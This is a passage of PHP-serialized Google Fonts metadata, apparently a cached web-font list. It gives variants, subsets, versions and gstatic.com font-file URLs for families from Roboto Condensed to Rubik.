Condensed\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"300\";s:94:\"http://fonts.gstatic.com/s/robotocondensed/v25/ieVi2ZhZI2eCN5jzbjEETS9weq8-33mZKCMSbvtdYyQ.ttf\";s:9:\"300italic\";s:97:\"http://fonts.gstatic.com/s/robotocondensed/v25/ieVg2ZhZI2eCN5jzbjEETS9weq8-19eDpCEYatlYcyRi4A.ttf\";s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/robotocondensed/v25/ieVl2ZhZI2eCN5jzbjEETS9weq8-59WxDCs5cvI.ttf\";s:6:\"italic\";s:93:\"http://fonts.gstatic.com/s/robotocondensed/v25/ieVj2ZhZI2eCN5jzbjEETS9weq8-19e7CAk8YvJEeg.ttf\";s:3:\"700\";s:94:\"http://fonts.gstatic.com/s/robotocondensed/v25/ieVi2ZhZI2eCN5jzbjEETS9weq8-32meKCMSbvtdYyQ.ttf\";s:9:\"700italic\";s:97:\"http://fonts.gstatic.com/s/robotocondensed/v25/ieVg2ZhZI2eCN5jzbjEETS9weq8-19eDtCYYatlYcyRi4A.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1166;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Roboto Flex\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:287:\"http://fonts.gstatic.com/s/robotoflex/v9/NaN4epOXO_NexZs0b5QrzlOHb8wCikXpYqmZsWI-__OGfttPZktqc2VdZ80KvCLZaPcSBZtOx2MifRuWR28sPJtUMbsFEK6cRrleUx9Xgbm3WLHa_F4Ep4Fm0PN19Ik5Dntczx0wZGzhPlL1YNMYKbv9_1IQXOw7AiUJVXpRJ6cXW4O8TNGoXjC79QRyaLshNDUf3e0O-gn5rrZCu20YNYG0EACUTNK-QKavMlxGIY8dxef0jQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1167;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Roboto Mono\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:9:\"100italic\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vuPQ--5Ip2sSQ.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_XvqPQ--5Ip2sSQ.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_gPqPQ--5Ip2sSQ.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_3vqPQ--5Ip2sSQ.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_7PqPQ--5Ip2sSQ.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_AP2PQ--5Ip2sSQ.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/robotomono/v22/L0xuDF4xlVMF-BfR8bXMIhJHg45mwgGEFl0_Of2PQ--5Ip2sSQ.ttf\";s:9:\"100italic\";s:98:\"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlnAeW9AJi8SZwt.ttf\";s:9:\"200italic\";s:98:\"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrnnAOW9AJi8SZwt.ttf\";s:9:\"300italic\";s:98:\"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrk5AOW9AJi8SZwt.ttf\";s:6:\"italic\";s:98:\"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlnAOW9AJi8SZwt.ttf\";s:9:\"500italic\";s:98:\"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrlVAOW9AJi8SZwt.ttf\";s:9:\"600italic\";s:98:\"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrm5B-W9AJi8SZwt.ttf\";s:9:\"700italic\";s:98:\"http://fonts.gstatic.com/s/robotomono/v22/L0xoDF4xlVMF-BfR8bXMIjhOsXG-q2oeuFoqFrmAB-W9AJi8SZwt.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1168;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Roboto Serif\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:149:\"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEliosp6d2Af5fR4k.ttf\";s:3:\"200\";s:149:\"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElqotp6d2Af5fR4k.ttf\";s:3:\"300\";s:149:\"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElnQtp6d2Af5fR4k.ttf\";s:7:\"regular\";s:149:\"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEliotp6d2Af5fR4k.ttf\";s:3:\"500\";s:149:\"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElhgtp6d2Af5fR4k.ttf\";s:3:\"600\";s:149:\"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElvQqp6d2Af5fR4k.ttf\";s:3:\"700\";s:149:\"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEls0qp6d2Af5fR4k.ttf\";s:3:\"800\";s:149:\"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcElqoqp6d2Af5fR4k.ttf\";s:3:\"900\";s:149:\"http://fonts.gstatic.com/s/robotoserif/v8/R71RjywflP6FLr3gZx7K8UyuXDs9zVwDmXCb8lxYgmuii32UGoVldX6UgfjL4-3sMM_kB_qXSEXTJQCFLH5-_bcEloMqp6d2Af5fR4k.ttf\";s:9:\"100italic\";s:152:\"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuT-V8BdxaV4nUFw.ttf\";s:9:\"200italic\";s:152:\"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-Juz-R8BdxaV4nUFw.ttf\";s:9:\"300italic\";s:152:\"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuEeR8BdxaV4nUFw.ttf\";s:6:\"italic\";s:152:\"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuT-R8BdxaV4nUFw.ttf\";s:9:\"500italic\";s:152:\"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JufeR8BdxaV4nUFw.ttf\";s:9:\"600italic\";s:152:\"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JukeN8BdxaV4nUFw.ttf\";s:9:\"700italic\";s:152:\"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-JuqON8BdxaV4nUFw.ttf\";s:9:\"800italic\";s:152:\"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-Juz-N8BdxaV4nUFw.ttf\";s:9:\"900italic\";s:152:\"http://fonts.gstatic.com/s/robotoserif/v8/R71XjywflP6FLr3gZx7K8UyEVQnyR1E7VN-f51xYuGCQepOvB0KLc2v0wKKB0Q4MSZxyqf2CgAchbDJ69BcVZxkDg-Ju5uN8BdxaV4nUFw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1169;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Roboto Slab\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjojIWWaG5iddG-1A.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoDISWaG5iddG-1A.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjo0oSWaG5iddG-1A.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjojISWaG5iddG-1A.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjovoSWaG5iddG-1A.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoUoOWaG5iddG-1A.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoa4OWaG5iddG-1A.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoDIOWaG5iddG-1A.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/robotoslab/v24/BngbUXZYTXPIvIBgJJSb6s3BzlRRfKOFbvjoJYOWaG5iddG-1A.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1170;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Rochester\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/rochester/v18/6ae-4KCqVa4Zy6Fif-Uy31vWNTMwoQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1171;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Rock Salt\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/rocksalt/v18/MwQ0bhv11fWD6QsAVOZbsEk7hbBWrA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1172;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"RocknRoll One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/rocknrollone/v10/kmK7ZqspGAfCeUiW6FFlmEC9guVhs7tfUxc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1173;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Rokkitt\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v29\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:87:\"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1rydpDLE76HvN6n.ttf\";s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1pyd5DLE76HvN6n.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1qsd5DLE76HvN6n.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1ryd5DLE76HvN6n.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1rAd5DLE76HvN6n.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1oscJDLE76HvN6n.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1oVcJDLE76HvN6n.ttf\";s:3:\"800\";s:87:\"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1pycJDLE76HvN6n.ttf\";s:3:\"900\";s:87:\"http://fonts.gstatic.com/s/rokkitt/v29/qFdb35qfgYFjGy5hukqqhw5XeRgdi1pbcJDLE76HvN6n.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1174;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Romanesco\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/romanesco/v21/w8gYH2ozQOY7_r_J7mSn3HwLqOqSBg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1175;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Ropa Sans\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/ropasans/v15/EYqxmaNOzLlWtsZSScyKWjloU5KP2g.ttf\";s:6:\"italic\";s:76:\"http://fonts.gstatic.com/s/ropasans/v15/EYq3maNOzLlWtsZSScy6WDNscZef2mNE.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1176;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Rosario\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:9:\"300italic\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v27\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM69GCWczd-YnOzUD.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM68YCWczd-YnOzUD.ttf\";s:3:\"500\";s:87:\"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM68qCWczd-YnOzUD.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM6_GDmczd-YnOzUD.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/rosario/v27/xfuu0WDhWW_fOEoY8l_VPNZfB7jPM6__Dmczd-YnOzUD.ttf\";s:9:\"300italic\";s:90:\"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQStFwfeIFPiUDn08.ttf\";s:6:\"italic\";s:90:\"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSo9wfeIFPiUDn08.ttf\";s:9:\"500italic\";s:90:\"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSr1wfeIFPiUDn08.ttf\";s:9:\"600italic\";s:90:\"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSlF3feIFPiUDn08.ttf\";s:9:\"700italic\";s:90:\"http://fonts.gstatic.com/s/rosario/v27/xfug0WDhWW_fOEoY2Fbnww42bCJhNLrQSmh3feIFPiUDn08.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1177;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Rosarivo\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/rosarivo/v20/PlI-Fl2lO6N9f8HaNAeC2nhMnNy5.ttf\";s:6:\"italic\";s:75:\"http://fonts.gstatic.com/s/rosarivo/v20/PlI4Fl2lO6N9f8HaNDeA0Hxumcy5ZX8.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1178;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Rouge Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/rougescript/v14/LYjFdGbiklMoCIQOw1Ep3S4PVPXbUJWq9g.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1179;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Rowdies\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/rowdies/v15/ptRMTieMYPNBAK219hth5O7yKQNute8.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/rowdies/v15/ptRJTieMYPNBAK21zrdJwObZNQo.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/rowdies/v15/ptRMTieMYPNBAK219gtm5O7yKQNute8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1180;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Rozha One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/rozhaone/v13/AlZy_zVFtYP12Zncg2khdXf4XB0Tow.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1181;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Rubik\";s:8:\"variants\";a:14:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:9:\"300italic\";i:8;s:6:\"italic\";i:9;s:9:\"500italic\";i:10;s:9:\"600italic\";i:11;s:9:\"700italic\";i:12;s:9:\"800italic\";i:13;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:6:\"hebrew\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-07-19\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"300\";s:83:\"http://fonts.gstatic.com/s/rubik/v21/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-WYi1UE80V4bVkA.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/rubik/v21/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4i1UE80V4bVkA.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/rubik/v21/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-NYi1UE80V4bVkA.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/rubik/v21/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-2Y-1UE80V4bVkA.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/rubik/v21/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-4I-1UE80V4bVkA.ttf\";s:3:\"800\";s:83:\"http://fonts.gstatic.com/s/rubik/v21/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-h4-1UE80V4bVkA.ttf\";s:3:\"900\";s:83:\"http://fonts.gstatic.com/s/rubik/v21/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-ro-1UE80V4bVkA.ttf\";s:9:\"300italic\";s:85:\"http://fonts.gstatic.com/s/rubik/v21/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8sDE0UwdYPFkJ1O.ttf\";s:6:\"italic\";s:85:\"http://fonts.gstatic.com/s/rubik/v21/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8tdE0UwdYPFkJ1O.ttf\";s:9:\"500italic\";s:85:\"http://fonts.gstatic.com/s/rubik/v21/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8tvE0UwdYPFkJ1O.ttf\";s:9:\"600italic\";s:85:\"http://fonts.gstatic.com/s/rubik/v21/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8uDFEUwdYPFkJ1O.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/rubik/v21/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8u6FEUwdYPFkJ1O.ttf\";s:9:\"800italic\";s:85:\"http://fonts.gstatic.com/s/rubik/v21/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8vdFEUwdYPFkJ1O.ttf\";s:9:\"900italic\";s:85:\"http://fonts.gstatic.com/s/rubik/v21/iJWbBXyIfDnIV7nEt3KSJbVDV49rz8v0FEUwdYPFkJ1O.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1182;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Rubik 